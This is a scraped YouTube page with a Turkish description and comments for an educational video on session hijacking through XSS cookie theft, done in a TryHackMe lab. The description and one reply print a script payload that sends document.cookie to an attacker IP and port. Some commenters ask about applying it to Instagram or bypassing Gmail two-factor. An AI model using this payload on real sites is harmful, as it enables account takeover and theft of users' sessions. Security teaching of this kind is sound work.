Çarpıdan Kapatmak YETMEZ! Session Hijacking Nedir?(Token ve Cookie Saldırıları!)

แชร์
ฝัง
  • เผยแพร่เมื่อ 22 ส.ค. 2024
  • Merhaba! Ben Sixpon. Bu videoda session hijacking zafiyetinden bahsettim. Normal şartlarda sıklıkla karşımıza çıkmasa da token ve cookie ile hesap ele geçirme saldırıları gerçekten tehlikeli bir siber güvenlik zafiyetidir. Oturum çalma saldırıları, xss gibi hedef sunucu üzerinde script çalıştırabildiğimiz durumlarda kullanılabilir. Bu tarz saldırılara karşı kendinizi savunmanız için böyle bir içerik hazırladım. Lütfen burada öğrendiğiniz bilgileri izninizin olmadığı hiçbir yerde kullanmayın.
    Kullandığım CTF - tryhackme.com/...
    Komut syntaxi: script fetch("IP:PORT/"+document.cookie) /script (youtube küçüktür büyüktür işaretlerine kızıyor. siz scriptlerden sonra büyüktür küçüktür koyun.)
    Sizler de bu CTF'i kullanarak bu saldırının nasıl yapıldığını öğrenip, kendi web sunucunuzu ve kendinizi korumaya alabilirsiniz!
    👉TryHackMe'ye kayıt ol: sixpon.com/try...
    📜Sertifika istiyorsan: sixpon.com/ine
    --------------------------------------
    📚 Siber Güvenlik Eğitimlerim: sixpon.com/egi...
    🐣 Siber Güvenlik Topluluğumuza Katıl: sixpon.com/dis...
    ❓ Sık Sorulan Sorular: sixpon.com/sss
    🌟- Kanal üyesi ol ve üyelere özel videolara eriş: sixpon.com/katil
    --------------------------------------------------------------
    İşbirliği, reklam ve sponsorluk için iletişim: sixpon.com/ile...
    NOT: Bu kanal ve içerikler yalnızca eğitici amaçlar doğrultusunda oluşturulmuştur. Ben yalnızca bana ait olan veya iznimin olduğu sistemleri ve cihazların güvenliğini test ediyorum. Burada öğrendiklerinizi size ait olmayan / izninizin olmadığı sistemlerde denemeyin.
    NOTE: This channel and contents is made for educational purposes only, I only test devices and systems that i own or have permission to test, you should not test the security of devices that you do not own or do not have permission to test.
    ---------------------

ความคิดเห็น • 55

  • @canevin4425
    @canevin4425 ปีที่แล้ว +1

    kral helal olsun gerçekten çok güzel anlatmışssın. Çok ciddi 3 gündür bu konu ile ilgili araştırma yapıyorum ama hiçbi şekilde anlaşılır bir türkçe kaynak bulamamıştım, ama sayende öğrendim çok teşekkür ederim

  • @berk2305
    @berk2305 ปีที่แล้ว +6

    Abi üst düzey hacking içerikleri de gelsin sadece temel seviye değil mesela exploit yazabiliriz seviliyorsun

    • @Sixpon
      @Sixpon  ปีที่แล้ว +6

      Bir şeyler geliştirme ve Yazma konularını ben pek sevmiyorum hocam. Onlar siber güvenliğin development kısmına giriyor. Ben sızma testleri üzerine içerikler üretiyorum. Ve de ürettiğim içerikleri en basite indirgeyerek anlattığım için giriş seviyesi olarak gözüküyor olabilir. 😂 Yorumun için teşekkür ederim

    • @gkrreis9012
      @gkrreis9012 ปีที่แล้ว +3

      Dostum bu zaten ileri seviye bir konu :)

  • @BLACK-xp4hn
    @BLACK-xp4hn 27 วันที่ผ่านมา

    çok açıklayıcı olmuş 👍

  • @Whynot1713
    @Whynot1713 ปีที่แล้ว +1

    abi ben senin kanalını keşfetmeden önce gerçekten hiç bir şey bilmiyordum cft falan nedir bilmiyordum sadece bir tane udemy kursu almıştım hiç işe yaramadı ama artık sayende ctf çözebiliyorum (bugün benim doğum günüm)

    • @Sixpon
      @Sixpon  ปีที่แล้ว

      Hocam öncelikle duyduğuma çok sevindim. Yardımcı olabildiysem ne mutlu! Umarım çok daha iyi yerlere gelirsiniz Ayrıca doğum gününüzü de en içten dileklerimle kutluyorum. Artık pastanın üstüne güzel bir doğum günü ctf'i gider

    • @Whynot1713
      @Whynot1713 ปีที่แล้ว

      @@Sixpon zaten üstüne ctf çözdüm xd

  • @animeparody5787
    @animeparody5787 ปีที่แล้ว

    Anlatım yeteneğin gerçekten güçlü 👏👍 ağzına sağlık 👏👏

    • @Sixpon
      @Sixpon  ปีที่แล้ว +2

      Güzel yorumunuz için teşekkür ediyorum hocam

    • @animeparody5787
      @animeparody5787 ปีที่แล้ว

      @@Sixpon rica ederim hocam ne demek

  • @rhmaslan
    @rhmaslan ปีที่แล้ว +1

    Abi, merhabalar. Öncelikle söylemek isterdim ki, çok iyi anlatıyorsun!, ikinci olarak, bir sorum olucaktı, hangi ctf çözdün?bu arada Azerbaycandan selamlar!, seviliyorsun✌🏻

    • @Sixpon
      @Sixpon  ปีที่แล้ว

      Selamlar hocam. Ctf olarak tryhackme marketplace üzerinden ufak bir örnek gösterdim. Sizler de oradan deneyebilirsiniz.

  • @swezyys
    @swezyys หลายเดือนก่อน

    emeğine sağlık abim

  • @72facia
    @72facia 11 หลายเดือนก่อน

    mantığını çok güzel anlatmışsın

  • @restrbatu6335
    @restrbatu6335 10 หลายเดือนก่อน

    cok güzel anlatım sagol

  • @lotrex4098
    @lotrex4098 ปีที่แล้ว

    Kullanışlı ve kolay eline sağlık

  • @yavut
    @yavut ปีที่แล้ว

    Eline sağlık abi

  • @Love-sx
    @Love-sx 2 หลายเดือนก่อน

    03.39 da ki solda açılan siyah ekran nasıl acliyor Windows 8 de oluyor mu Windows 8 de cmd var ne yazarsam yazayım hata veriyor her seferinde nasıl yapabilirim

  • @canncanzz1082
    @canncanzz1082 หลายเดือนก่อน

    İki asamali dogrulama olan gmail hesabinda ise yararmi sifreyi biliyorum ama dogrulamayi gecemiyorumm yolu nedir

  • @cyb3r_w0lf
    @cyb3r_w0lf ปีที่แล้ว

    Eline sağlık

    • @Sixpon
      @Sixpon  ปีที่แล้ว +1

      Teşekkür ederim hocam

  • @ayempeanuts
    @ayempeanuts หลายเดือนก่อน

    hocam bunu hangi sitelerde yapabiliyoruz

  • @OnlyPoncik
    @OnlyPoncik ปีที่แล้ว

    Hocam diğer databaseli websitesinde kolay takip yapabilmek için bir website alt yapısı var mı bunları kolay depolamak için arayüzlü

    • @Sixpon
      @Sixpon  ปีที่แล้ว

      Hocam cümleniz çok devrik olduğu için tam anlayamadım. Eğer database'e arayüzlü ve kolay erişmek için bir altyapı var mı? diye soruyorsanız, evet bu tarz sistemler var. Wordpress, phpmyadmin gibi bir çok cms'in databaseler ile uyumlu çalıştığı durumlar mevcut. Eğer sorunuzu farklı anladıysam lütfen tekrar sorun, yardımcı olmaya çalışayım.

  • @mehmetalikaya756
    @mehmetalikaya756 ปีที่แล้ว

    abi güzel anlatıyorsun da ben bunu deneyecek bir site bulamadım bir site önerebilir misin

    • @Sixpon
      @Sixpon  ปีที่แล้ว

      tryhackme.com/room/marketplace videoda kullandığım makine

  • @denizcansevercevirileri
    @denizcansevercevirileri ปีที่แล้ว

    👏

  • @tahaeryetisozen6318
    @tahaeryetisozen6318 ปีที่แล้ว

    ❤️‍🔥❤️‍🔥

  • @enes-onder
    @enes-onder ปีที่แล้ว

    Bu şekilde hesabını hacklediğimiz kişinin oturumuna şifresiz bir şekilde giriş yapabilir miyiz?

    • @Sixpon
      @Sixpon  ปีที่แล้ว

      Evet hocam, cookie bilgisini kendi cookie'miz olarak gösterip giriş yapabiliriz.

    • @enes-onder
      @enes-onder ปีที่แล้ว

      @@Sixpon Teşekkürler. Bizim platform da olmadı muhtemelen Key diye bir şey var onu da PHP tarafindan kontrol ediliyor diye düşünüyorum

  • @user-bt5qv6pr8d
    @user-bt5qv6pr8d 11 หลายเดือนก่อน +1

    script nerede hocam?

    • @Sixpon
      @Sixpon  11 หลายเดือนก่อน

      fetch("IP:PORT/"+document.cookie)

  • @orhanefekaptan2380
    @orhanefekaptan2380 ปีที่แล้ว

    Saçları beyaza boyatıp kanalın ismini Sixpon of rivia yapman yok mu ?

    • @Sixpon
      @Sixpon  ปีที่แล้ว

      Kardeşim ekmeğin arasına peynir koyamıyoruz neyin riviası 😂😂

    • @orhanefekaptan2380
      @orhanefekaptan2380 ปีที่แล้ว

      @@Sixpon Some Tekirdağ problems

    • @suleymankoksal2127
      @suleymankoksal2127 ปีที่แล้ว

      @@Sixpon hocam bimde yerli muz 12 liraya düşmüş sonuçta zengin itemi

  • @hifive1326
    @hifive1326 2 หลายเดือนก่อน

    hangi ctf bu hocam

    • @Sixpon
      @Sixpon  2 หลายเดือนก่อน

      Açıklamada yazıyor hocam

  • @lotrex4098
    @lotrex4098 ปีที่แล้ว

    sana nasıl ulaşabilirim

    • @Sixpon
      @Sixpon  ปีที่แล้ว

      Buradan ulaşabiliyorsunuz zaten hocam. Onun haricinde bir konu varsa discord sunucusunun soru-cevap kısmına konu açabilirsiniz. Özelden yardımcı olmuyorum, üzgünüm.

    • @lotrex4098
      @lotrex4098 ปีที่แล้ว

      @@Sixpon bende scripte kadar her şey oke ondan sore yok

  • @i4-jesus267
    @i4-jesus267 ปีที่แล้ว

    eline sağlık abi

  • @CarryShitpost
    @CarryShitpost ปีที่แล้ว

    abi bu scripti instagram vb. yerlerde aynı videodaki gibi nasıl yaparız kendi üzerimde test etmek istiyorum

  • @baycpp
    @baycpp ปีที่แล้ว

    Hocam instagram'da bulunan session id verisini nasıl alabiliriz?

    • @Sixpon
      @Sixpon  ปีที่แล้ว +1

      Burpsuite gibi bir proxy kullanarak giden ve gelen istekleri inceleyebilirsiniz.

    • @baycpp
      @baycpp ปีที่แล้ว

      @@Sixpon çok sağolun hocam

  • @aht_root7133
    @aht_root7133 ปีที่แล้ว +1

  • @medsa
    @medsa ปีที่แล้ว